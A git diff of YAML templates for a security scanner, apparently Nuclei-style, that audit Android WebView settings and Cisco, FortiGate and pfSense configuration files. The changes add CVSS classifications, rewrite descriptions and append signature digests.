extensions: - all - matchers: - type: word words: - "Landroid/webkit/WebSettings;->setJavaScriptEnabled(Z)V" + +# Enhanced by md on 2023/05/03 +# digest: 490a0046304402202cb44b3b176f00694b16cac7a61f5db343e65232d7dbb0e4c3f19815322ffa30022041f4229478a122c2b2f3b7878815a3391f9725e527b8eb7c18488d0c958b3324:922c64590222798bb761d5b6d8e72950 diff --git a/file/android/webview-load-url.yaml b/file/android/webview-load-url.yaml index d258156df2..3bcfd9ace9 100644 --- a/file/android/webview-load-url.yaml +++ b/file/android/webview-load-url.yaml @@ -1,16 +1,22 @@ id: webview-load-url info: - name: Webview loadUrl usage + name: WebView loadUrl - Detect author: gaurang severity: info + description: WebView loadUrl usage was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 tags: android,file - file: - extensions: - all - matchers: - type: word words: - - "Landroid/webkit/WebView;->loadUrl(Ljava/lang/String;)V" \ No newline at end of file + - "Landroid/webkit/WebView;->loadUrl(Ljava/lang/String;)V" + +# Enhanced by md on 2023/05/02 +# digest: 4a0a0047304502203e6573c6bd46a8ffccb46b934de85f8489aa4206ace3c395eb97ded8a483ca6d022100dc2c1947834d8746ee19b34dc7ca18c67691235cb4d04c3530b52d9a072cdf22:922c64590222798bb761d5b6d8e72950 diff --git a/file/android/webview-universal-access.yaml b/file/android/webview-universal-access.yaml index 56fe5fb8ac..2497ace769 100644 --- a/file/android/webview-universal-access.yaml +++ b/file/android/webview-universal-access.yaml @@ -1,16 +1,22 @@ id: webview-universal-access info: - name: Webview Universal Access enabled + name: Android WebView Universal Access - Detect author: gaurang severity: medium + description: Android WebView Universal Access enabling was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 tags: android,file - file: - extensions: - all - matchers: - type: word words: - - "Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V" \ No newline at end of file + - "Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V" + +# Enhanced by md on 2023/05/03 +# digest: 4a0a00473045022100a47e2082fc66a04948c89867eea66d41624cf5a26a7e0e6faebecd5e18281a74022025ef3b1093b7cfa7eeb45aea5a30518577674355526f2621c96bde80d175642a:922c64590222798bb761d5b6d8e72950 diff --git a/file/audit/cisco/configure-aaa-service.yaml b/file/audit/cisco/configure-aaa-service.yaml index 70d249dfef..5d16f069d4 100644 --- a/file/audit/cisco/configure-aaa-service.yaml +++ b/file/audit/cisco/configure-aaa-service.yaml @@ -1,15 +1,18 @@ id: configure-aaa-service info: - name: Configure AAA service + name: Cisco AAA Service Configuration - Detect author: pussycat0x severity: info description: | - Authentication, authorization and accounting (AAA) services provide an authoritative source for managing and monitoring access for devices. + Cisco authentication, authorization and accounting service configuration was detected. reference: - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-cr-a2.html#GUID-E05C2E00-C01E-4053-9D12-EC37C7E8EEC5 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 tags: cisco,config-audit,cisco-switch,file,router - file: - extensions: - conf @@ -24,3 +27,6 @@ file: - type: word words: - "configure terminal" + +# Enhanced by md on 2023/05/02 +# digest: 4a0a00473045022079df055c2e5696994818ce4c85c08341ceb33ee8812c8f7c489991bbb85c13e5022100889d8d69f0812d3402167ff57e13d702a8fde570d27ec634e6ec90edc647b81e:922c64590222798bb761d5b6d8e72950 diff --git a/file/audit/cisco/configure-service-timestamps-debug.yaml b/file/audit/cisco/configure-service-timestamps-debug.yaml index 4980d09b8c..0b03068470 100644 --- a/file/audit/cisco/configure-service-timestamps-debug.yaml +++ b/file/audit/cisco/configure-service-timestamps-debug.yaml @@ -1,15 +1,18 @@ id: configure-service-timestamps-debug info: - name: Configure Service Timestamps for Debug + name: Cisco Configure Service Timestamps for Debug - Detect author: pussycat0x severity: info description: | - To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. Use the no form of this command to disable this service. + The configuration for service timestamps on Cisco devices was not implemented for debugging purposes. It's important to note that timestamps can be added to either debugging or logging messages independently. reference: - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 tags: cisco,config-audit,cisco-switch,file,router - file: - extensions: - conf @@ -24,3 +27,6 @@ file: - type: word words: - "configure terminal" + +# Enhanced by md on 2023/05/02 +# digest: 4a0a00473045022100bc3785d0a7b24f396ab4fed4a8d9f901369fe263a0749c872fcaf5385e07db80022003bd8f4e1e5c637b8226641ce70b584a59608f1311c98f43fa7b74f0605ffe75:922c64590222798bb761d5b6d8e72950 diff --git a/file/audit/cisco/configure-service-timestamps-logmessages.yaml b/file/audit/cisco/configure-service-timestamps-logmessages.yaml index 7a2bc90538..4e4dcca866 100644 --- a/file/audit/cisco/configure-service-timestamps-logmessages.yaml +++ b/file/audit/cisco/configure-service-timestamps-logmessages.yaml @@ -1,15 +1,18 @@ id: configure-service-log-messages info: - name: Configure Service Timestamps Log Messages + name: Cisco Configure Service Timestamps Log Messages - Detect author: pussycat0x severity: info description: | - To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. Use the no form of this command to disable this service. + Cisco service timestamp configuration for log messages was not implemented. reference: - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 tags: cisco,config-audit,cisco-switch,file,router - file: - extensions: - conf @@ -24,3 +27,6 @@ file: - type: word words: - "configure terminal" + +# Enhanced by md on 2023/05/02 +# digest: 4a0a00473045022100eec5568ee37b9570d34f5a84ef8cb6c87e0d4c328c563a315bae6485d81f34c602205dd2190d468102b996589f3d15fca169cf6805a71b5cd76c30f5db5d02189b25:922c64590222798bb761d5b6d8e72950 diff --git a/file/audit/cisco/disable-ip-source-route.yaml b/file/audit/cisco/disable-ip-source-route.yaml index c1c2077708..670a4fbd46 100644 --- a/file/audit/cisco/disable-ip-source-route.yaml +++ b/file/audit/cisco/disable-ip-source-route.yaml @@ -1,15 +1,19 @@ id: disable-ip-source-route info: - name: Disable IP source-route + name: Cisco Disable IP Source-Route - Detect author: pussycat0x severity: info description: | - Organizations should plan and implement network policies to ensure unnecessary services are explicitly disabled. The 'ip source-route' feature has been used in several attacks and should be disabled. + Cisco IP source-route functionality has been utilized in several attacks. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: Disable IP source-route where appropriate. reference: - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/ipaddr/command/ipaddr-cr-book/ipaddr-i4.html#GUID-C7F971DD-358F-4B43-9F3E-244F5D4A3A93 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 tags: cisco,config-audit,cisco-switch,file,router - file: - extensions: - conf @@ -24,3 +28,5 @@ file: - type: word words: - "configure terminal" + +# digest: 4a0a00473045022074c0a1cf8e4aa1aae86601df3d56f2d8a24cbdfd644ff047cfb34ed4c79397080221009b5f95e3a473009298bb7cf875d282617fb93ad30dafc9c3f2efcba049e672ea:922c64590222798bb761d5b6d8e72950 diff --git a/file/audit/cisco/disable-pad-service.yaml b/file/audit/cisco/disable-pad-service.yaml index 80df2f9b7f..c085095321 100644 --- a/file/audit/cisco/disable-pad-service.yaml +++ b/file/audit/cisco/disable-pad-service.yaml @@ -1,15 +1,18 @@ id: disable-pad-service info: - name: Disable PAD service + name: Cisco Disable PAD - Detect author: pussycat0x severity: info description: | - To reduce the risk of unauthorized access, organizations should implement a security policy restricting unnecessary services such as the 'PAD' service. + Cisco PAD service has proven vulnerable to attackers. To reduce the risk of unauthorized access, organizations should implement a security policy restricting or disabling unnecessary access. reference: - http://www.cisco.com/en/US/docs/ios-xml/ios/wan/command/wan-s1.html#GUID-C5497B77-3FD4-4D2F-AB08-1317D5F5473B + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 tags: cisco,config-audit,cisco-switch,file,router - file: - extensions: - conf @@ -24,3 +27,5 @@ file: - type: word words: - "configure terminal" + +# digest: 4a0a00473045022100c59ff03045b104e65dc2f92569ebc4ed981b39844b3e1fc03d48b1ed82e1e0a3022056fd96605d454caebc29595bf2d7771efe3b438061f4c50245a3897f7176ddcd:922c64590222798bb761d5b6d8e72950 diff --git a/file/audit/cisco/enable-secret-for-password-user-and-.yaml b/file/audit/cisco/enable-secret-for-password-user-and-.yaml index f27314611e..f178b8c71d 100644 --- a/file/audit/cisco/enable-secret-for-password-user-and-.yaml +++ b/file/audit/cisco/enable-secret-for-password-user-and-.yaml @@ -5,11 +5,10 @@ info: author: pussycat0x severity: info description: | - To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. Use the no form of this command to disable this service. + To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. Use the no form of this command to disable this service. reference: - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm tags: cisco,config-audit,cisco-switch,file,router - file: - extensions: - conf @@ -24,3 +23,5 @@ file: - type: word words: - "configure terminal" + +# digest: 4a0a0047304502204f6beffea112852a6e7dbf11a7fd8fe97da58385e475b5d3485a12678568107f022100afe3edd05b216cb7a94d9080430e939c95b36d13f0195516681a1e2b31874aec:922c64590222798bb761d5b6d8e72950 diff --git a/file/audit/cisco/logging-enable.yaml b/file/audit/cisco/logging-enable.yaml index 10b20ed2e4..cf24e249e4 100644 --- a/file/audit/cisco/logging-enable.yaml +++ b/file/audit/cisco/logging-enable.yaml @@ -1,15 +1,18 @@ id: logging-enable info: - name: Logging enable + name: Cisco Logging Enable - Detect author: pussycat0x severity: info description: | - Enabling the Cisco IOS 'logging enable' command enforces the monitoring of technology risks for the organizations' network devices. + Cisco logging 'logging enable' enable command enforces the monitoring of technology risks for organizations' network devices. reference: - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/xe-16-6/config-mgmt-xe-16-6-book/cm-config-logger.pdf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 tags: cisco,config-audit,cisco-switch,file - file: - extensions: - conf @@ -24,3 +27,6 @@ file: - type: word words: - "configure terminal" + +# Enhanced by md on 2023/05/03 +# digest: 4a0a0047304502202a8c038850f96007448de5721920df67d783f04b494c7cad889ff010905c651a0221008d64ff006c97de269f9503222257a6d9bf550a462eddb4112d600a65513b1321:922c64590222798bb761d5b6d8e72950 diff --git a/file/audit/cisco/set-and-secure-passwords.yaml b/file/audit/cisco/set-and-secure-passwords.yaml index 703d29b8d3..d28597da45 100644 --- a/file/audit/cisco/set-and-secure-passwords.yaml +++ b/file/audit/cisco/set-and-secure-passwords.yaml @@ -1,15 +1,18 @@ id: set-and-secure-passwords info: - name: Set and secure passwords + name: Cisco Set and Secure Password - Detect author: pussycat0x severity: info description: | - To set a local password to control access to various privilege levels, use the enable password command in global configuration mode. To remove the password requirement, use the no form of this command. + Cisco set and secure password functionality is recommended to control privilege level access. To set a local password to control access to various privilege levels, use the enable password command in global configuration mode. To remove the password requirement, use the no form of this command. reference: - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/d1/sec-d1-cr-book/sec-cr-e1.html#wp3884449514 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 tags: cisco,config-audit,cisco-switch,file - file: - extensions: - conf @@ -24,3 +27,6 @@ file: - type: word words: - "configure terminal" + +# Enhanced by md on 2023/05/03 +# digest: 490a0046304402207029e29a2d75aea030e8818991a5da7ab7c47204f24a1c238ddcfd78138d8c2e022013f3a96886a9daa37c9df80d46fe6ec3f59a1cce3423fae634016908b8e5ee2c:922c64590222798bb761d5b6d8e72950 diff --git a/file/audit/fortigate/auto-usb-install.yaml b/file/audit/fortigate/auto-usb-install.yaml index b5394056d7..b096335578 100644 --- a/file/audit/fortigate/auto-usb-install.yaml +++ b/file/audit/fortigate/auto-usb-install.yaml @@ -1,13 +1,16 @@ id: auto-usb-install info: - name: Auto USB Installation Enabled + name: Fortinet Auto USB Installation Enabled - Detect author: pussycat0x severity: info - description: If USB installation is not disabled, an attacker with physical access to a FortiGate could load a new configuration or firmware using the USB port. + description: Via Fortinet Auto USB installation, an attacker with physical access to a FortiGate can load a new configuration or firmware using the USB port, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 tags: audit,config,file,firewall,fortigate - file: - extensions: - conf @@ -26,3 +29,6 @@ file: - "config router" - "config firewall" condition: or + +# Enhanced by md on 2023/05/03 +# digest: 4b0a00483046022100ccc576bcc6257505a68ceaefbbe56b0c66e38c49ec5b93942176d669e5e01959022100fab05994e7edde53474a33d7e43c9513f59ff7a55d485122457864b2390aeb5e:922c64590222798bb761d5b6d8e72950 diff --git a/file/audit/fortigate/heuristic-scan.yaml b/file/audit/fortigate/heuristic-scan.yaml index 801b499ada..29791797a7 100644 --- a/file/audit/fortigate/heuristic-scan.yaml +++ b/file/audit/fortigate/heuristic-scan.yaml @@ -1,13 +1,17 @@ id: heuristic-scan info: - name: Heuristic scanning is not configured + name: Fortinet Heuristic Scanning not Configured - Detect author: pussycat0x severity: info - description: Heuristic scanning is a technique used to identify previously unknown viruses. A value of block enables heuristic AV scanning of binary files and blocks any detected. A replacement message will be forwarded to the recipient. Blocked files are quarantined if quarantine is enabled. + description: | + Fortinet heuristic scanning configuration is advised to thwart attacks. Heuristic scanning is a technique used to identify previously unknown viruses. A value of block enables heuristic AV scanning of binary files and blocks any detected. A replacement message is forwarded to the recipient, and blocked files are quarantined if quarantine is enabled. reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 tags: audit,config,file,firewall,fortigate - file: - extensions: - conf @@ -26,3 +30,6 @@ file: - "config router" - "config firewall" condition: or + +# Enhanced by md on 2023/05/03 +# digest: 4a0a00473045022100fa37189cba4ed2ec0013bb0b51b8a53f8d0cbc15e173827ddb5936e9d9bf7f1e02206dfeeaf7dffec71e85545522022158bb29aa157802a79a06a040ed4c112abbb5:922c64590222798bb761d5b6d8e72950 diff --git a/file/audit/fortigate/inactivity-timeout.yaml b/file/audit/fortigate/inactivity-timeout.yaml index f73b9e5ffb..9d7ed9be4f 100644 --- a/file/audit/fortigate/inactivity-timeout.yaml +++ b/file/audit/fortigate/inactivity-timeout.yaml @@ -1,13 +1,16 @@ id: inactivity-timeout info: - name: Inactivity Timeout Not Implemented + name: Fortinet Inactivity Timeout Not Implemented - Detect author: pussycat0x severity: info - description: Lack of Inactivity Timeout gives the unauthorized user to act within that threshold if the administrator is away from the computer. + description: If Fortinet inactivity timeout functionality is disabled, an attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations within that window if the administrator is away from the computer. reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 tags: audit,config,file,firewall,fortigate - file: - extensions: - conf @@ -25,3 +28,6 @@ file: - "config router" - "config firewall" condition: or + +# Enhanced by md on 2023/05/03 +# digest: 4a0a00473045022100cea6b95920897938fc382b500396ac8f32ff99b0eec0ecaf088fb5cb0449776802202a68db332abee65d2afb58c2fa4c6934543e89992df389a9f324ad70d6a67c9b:922c64590222798bb761d5b6d8e72950 diff --git a/file/audit/fortigate/maintainer-account.yaml b/file/audit/fortigate/maintainer-account.yaml index afad089999..eb0bb9f443 100644 --- a/file/audit/fortigate/maintainer-account.yaml +++ b/file/audit/fortigate/maintainer-account.yaml @@ -1,13 +1,16 @@ id: maintainer-account info: - name: Maintainer Account Not Implemented + name: Fortinet Maintainer Account Not Implemented - Detect author: pussycat0x severity: info - description: If the FortiGate is compromised and Password is not recoverable. A maintainer account can be used by an administrator with physical access to log into CLI.. + description: In Fortinet, if a FortiGate is compromised and the password is not recoverable, a maintainer account can be used by an administrator with physical access to log into CLI. reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 tags: audit,config,file,firewall,fortigate - file: - extensions: - conf @@ -25,3 +28,5 @@ file: - "config router" - "config firewall" condition: or + +# digest: 4a0a0047304502210095dfe6f50e1344c29cb73fdf72e79eec9b146ee421cafb0ec09d8b252f26cd18022019682a67d6b6265c8c4ca6ba95d900ce429ad5bbb188af95953698ab445dad8b:922c64590222798bb761d5b6d8e72950 diff --git a/file/audit/fortigate/password-policy.yaml b/file/audit/fortigate/password-policy.yaml index b66aa24bc0..558049ad80 100644 --- a/file/audit/fortigate/password-policy.yaml +++ b/file/audit/fortigate/password-policy.yaml @@ -1,13 +1,16 @@ id: password-policy info: - name: Password Policy not Set + name: Fortinet Password Policy Not Set - Detect author: pussycat0x severity: info - description: The Administrative Password Policy is not set. Use the password policy feature to ensure all administrators use secure passwords that meet your organization's requirements. + description: Fortinet administrative password policy is not set. Using this feature is recommended to ensure all administrators use secure passwords that meet organizations' requirements. reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 tags: fortigate,config,audit,file,firewall - file: - extensions: - conf @@ -25,3 +28,5 @@ file: - "config router" - "config firewall" condition: or + +# digest: 4a0a00473045022100973422e6e42cfee55eeb7bcb78a54ebc4382c2e74d87bd231fcdd44e89c42b5d02207cf72f8c099025aa5c7aad767d31a2847cf74fbbe73c43194502bf807d9c81b7:922c64590222798bb761d5b6d8e72950 diff --git a/file/audit/fortigate/remote-auth-timeout.yaml b/file/audit/fortigate/remote-auth-timeout.yaml index fdf19cbb5f..ac1fdaa0c2 100644 --- a/file/audit/fortigate/remote-auth-timeout.yaml +++ b/file/audit/fortigate/remote-auth-timeout.yaml @@ -1,13 +1,17 @@ id: remote-auth-timeout info: - name: Remote Authentication timeout not set + name: Fortinet Remote Authentication Timeout Not Set - Detect author: pussycat0x severity: info - description: Lack of Inactivity Timeout gives the unauthorized user to act within that threshold if the administrator is away from the computer. - reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate + description: Fortinet remote authentication timeout functionality is recommended to be enabled. Lack of a set timeout can allow an attacker to act within that threshold if the administrator is away from the computer, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 tags: audit,config,file,firewall,fortigate - file: - extensions: - conf @@ -25,3 +29,5 @@ file: - "config router" - "config firewall" condition: or + +# digest: 4a0a004730450220460b3387929bbf2d35f5e220f1501f7e95aee4169633d49cab715e89830e44b102210090004afc4f71c06bfc0c3b2762dd2f6094c2abbe7cef201ebd30f98b7c38e3a5:922c64590222798bb761d5b6d8e72950 diff --git a/file/audit/fortigate/scp-admin.yaml b/file/audit/fortigate/scp-admin.yaml index edec95f93c..16c5237d2b 100644 --- a/file/audit/fortigate/scp-admin.yaml +++ b/file/audit/fortigate/scp-admin.yaml @@ -1,13 +1,16 @@ id: scp-admin info: - name: Admin-SCP Disabled + name: Fortinet Admin-SCP Disabled - Detect author: pussycat0x severity: info - description: Disable SCP by default. Enabling SCP allows downloading the configuration file from the FortiGate as an alternative method of backing up the configuration file. + description: Fortinet Admin-SCP functionality is recommended to be disabled by default. Enabling SCP allows download of the configuration file from the FortiGate as an alternative method of backing up the configuration file. reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 tags: audit,config,file,firewall,fortigate - file: - extensions: - conf @@ -25,3 +28,5 @@ file: - "config router" - "config firewall" condition: or + +# digest: 4a0a00473045022017907ef84d543d31938a81f98b74c0e2cbb8046446564d60d93ab016b211ccbe022100bf653ab2e2a8cd2b59fe160d7c5a605fdb079fff2eb049540f0c0e59d79272dd:922c64590222798bb761d5b6d8e72950 diff --git a/file/audit/fortigate/strong-ciphers.yaml b/file/audit/fortigate/strong-ciphers.yaml index 5c76f30a41..27d0e89f82 100644 --- a/file/audit/fortigate/strong-ciphers.yaml +++ b/file/audit/fortigate/strong-ciphers.yaml @@ -7,7 +7,6 @@ info: description: Weak Ciphers can be broken by an attacker in a local network and can perform attacks like Blowfish. reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices tags: audit,config,file,firewall,fortigate - file: - extensions: - conf @@ -25,3 +24,5 @@ file: - "config router" - "config firewall" condition: or + +# digest: 4a0a00473045022100c807aaceda1d677145cd86b23d68df8651d47461ff50883ab407b999b3ab89d8022066419939b0b5d9f1d44fecd6958ab45e46a3f1c931ef94f2f36ca71907d46974:922c64590222798bb761d5b6d8e72950 diff --git a/file/audit/pfsense/configure-dns-server.yaml b/file/audit/pfsense/configure-dns-server.yaml index 90955427fa..0798c2e990 100644 --- a/file/audit/pfsense/configure-dns-server.yaml +++ b/file/audit/pfsense/configure-dns-server.yaml @@ -1,17 +1,20 @@ id: configure-dns-server info: - name: Configure DNS Server + name: DNS Server Not Implemented - Detect author: pussycat0x severity: info description: | - The purpose DNs server is to perform the resolution of system hostnames to Internet Protocol (IP) addresses. + DNS is recommended to be configured over TLS. This prevents intermediate parties and potential attackers from viewing the content of DNS queries and can also assure that DNS is being provided by the expected DNS servers. reference: | https://docs.netgate.com/pfsense/en/latest/recipes/dns-over-tls.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: verified: true tags: firewall,config,audit,pfsense,file - file: - extensions: - xml @@ -28,3 +31,6 @@ file: - "" - "" condition: and + +# Enhanced by md on 2023/05/04 +# digest: 4a0a0047304502206e6b95e81bec7d3776c15a7d13ee6ceec276641f2cea2b0e3f27cfbff11ffb0b022100dc3dd5041f7ff2b046b72bb868c4e08c18766913069ee573ca4da3347a603e75:922c64590222798bb761d5b6d8e72950 diff --git a/file/audit/pfsense/configure-session-timeout.yaml b/file/audit/pfsense/configure-session-timeout.yaml index 8dadd7818a..15ab0b160b 100644 --- a/file/audit/pfsense/configure-session-timeout.yaml +++ b/file/audit/pfsense/configure-session-timeout.yaml @@ -1,17 +1,20 @@ id: configure-session-timeout info: - name: Configure Sessions Timeout + name: PfSence Configure Sessions Timeout Not Set - Detect author: pussycat0x severity: info description: | - Indefinite or even long session timeout window increase the risk of attackers abusing abandoned sessions. + Configure sessions timeout is recommended to be enabled. An indefinite or even long session timeout window can increase the risk of an attacker abusing abandoned sessions and potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. reference: | https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: verified: true tags: firewall,config,audit,pfsense,file - file: - extensions: - xml @@ -31,3 +34,6 @@ file: - "" - "" condition: and + +# Enhanced by md on 2023/05/04 +# digest: 4a0a004730450220428bd620e5177de61a4b58993a27ef7ff13adb0f5fbbd6590d7801c1f719b1710221009a9c3c9efdc4581d55bbbdebf48baf7d32ebd75cfb3cd0f0e2326b91922aceed:922c64590222798bb761d5b6d8e72950 diff --git a/file/audit/pfsense/enable-https-protocol.yaml b/file/audit/pfsense/enable-https-protocol.yaml index b553262cde..5c4e6d4459 100644 --- a/file/audit/pfsense/enable-https-protocol.yaml +++ b/file/audit/pfsense/enable-https-protocol.yaml @@ -1,18 +1,20 @@ id: enable-https-protocol info: - name: Enable HTTPS on Web Management + name: Pfsence Web Admin Management Portal HTTPS Not Set - Detect author: pussycat0x severity: info description: | - Web Admin Management Portal should only be accessed using HTTPS Protocol.HTTP transmits all data (including passwords) in clear text over the network and - provides no assurance of the identity of the hosts involved. + PfSence Web Admin Management Portal is recommended to be accessible using only HTTPS protocol. HTTP transmits all data, including passwords, in clear text over the network and provides no assurance of the identity of the hosts involved, making it possible for an attacker to obtain sensitive information, modify data, and/or execute unauthorized operations. reference: | https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: verified: true tags: firewall,config,audit,pfsense,file - file: - extensions: - xml @@ -31,3 +33,6 @@ file: - "" - "" condition: and + +# Enhanced by md on 2023/05/04 +# digest: 4a0a0047304502200b7f468fa03dc5a9da4434cc16c2158051689e6367855fc15e3bbebc5396ce03022100dfcf501466defaa4960609da00c79d3015a88752b60735097487324e61281425:922c64590222798bb761d5b6d8e72950 diff --git a/file/audit/pfsense/known-default-account.yaml b/file/audit/pfsense/known-default-account.yaml index 5edff80ccb..0a2b4706cd 100644 --- a/file/audit/pfsense/known-default-account.yaml +++ b/file/audit/pfsense/known-default-account.yaml @@ -1,18 +1,18 @@ id: known-default-account info: - name: Known Default Account - Detect + name: PfSence Known Default Account - Detect author: pussycat0x severity: info description: | - In order to attempt access to known devices' platforms, attackers use the available database of the known default accounts for each platform or Operating System. - The known default accounts are often (without limiting to) the following: 'admin'. + PfSence configured known default accounts are recommended to be deleted. In order to attempt access to known devices' platforms, an attacker can use the available database of the known default accounts for each platform or operating system. Known default accounts are often, but not limited to, 'admin'. reference: | - https://docs.netgate.com/pfsense/en/latest/usermanager/defaults.html - remediation: | - Deletes the known default accounts configured. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 tags: audit,config,file,firewall,pfsense - file: - extensions: - xml @@ -25,3 +25,6 @@ file: - "" - "user-shell-access" condition: and + +# Enhanced by md on 2023/05/04 +# digest: 490a004630440220021b724d5c938c772dce4f4fb69947f5b07bb278e82211289af983207ea2091902205e36a512ae90e197d329cfa247658297e6bf6ffdde97aa1f6c54900c057c1448:922c64590222798bb761d5b6d8e72950 diff --git a/file/audit/pfsense/password-protected-consolemenu.yaml b/file/audit/pfsense/password-protected-consolemenu.yaml index e66727a356..bbeabdd227 100644 --- a/file/audit/pfsense/password-protected-consolemenu.yaml +++ b/file/audit/pfsense/password-protected-consolemenu.yaml @@ -1,17 +1,20 @@ id: password-protected-consolemenu info: - name: Configure Password Protected on Console Menu + name: PfSence Consolemenu Password Protection Not Implememnted - Detect author: pussycat0x severity: info description: | - An unattended computer with an open Console Menu session to the device could allow an unauthorized user access to the firewall’s management. + PfSence password protection via the Console Menu is recommended to be configured. An unattended computer with an open Console Menu session can allow an unauthorized user access to the firewall management. reference: | https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: verified: true tags: firewall,config,audit,pfsense,file - file: - extensions: - xml @@ -31,3 +34,6 @@ file: - "" - "" condition: and + +# Enhanced by md on 2023/05/04 +# digest: 490a00463044022012ee67126f50b5cf259b101b1f2b9ea34d9675f8d1741eb4edfb87b4abfeca6202207f3522cd9d8e35fe7d2dcccc815c28638b0799ceded0dbeea3572cb3f612e891:922c64590222798bb761d5b6d8e72950 diff --git a/file/audit/pfsense/set-hostname.yaml b/file/audit/pfsense/set-hostname.yaml index 0959a0ed8e..f94a46b622 100644 --- a/file/audit/pfsense/set-hostname.yaml +++ b/file/audit/pfsense/set-hostname.yaml @@ -1,16 +1,18 @@ id: set-hostname info: - name: Ensure Hostname is Set + name: PfSence Hostname Not Set - Detect author: pussycat0x severity: info description: | - Ensure Hostname is set is a process that helps to ensure that the computer or device is being identified correctly on a network. - The hostname is a unique identifier for the device, and it is important that it is properly set so that other devices on the network can identify it. + PfSence Hostname should be set so that other devices on the network can correctly identify it. The hostname is a unique identifier for the device. reference: | https://docs.netgate.com/pfsense/en/latest/config/general.html + 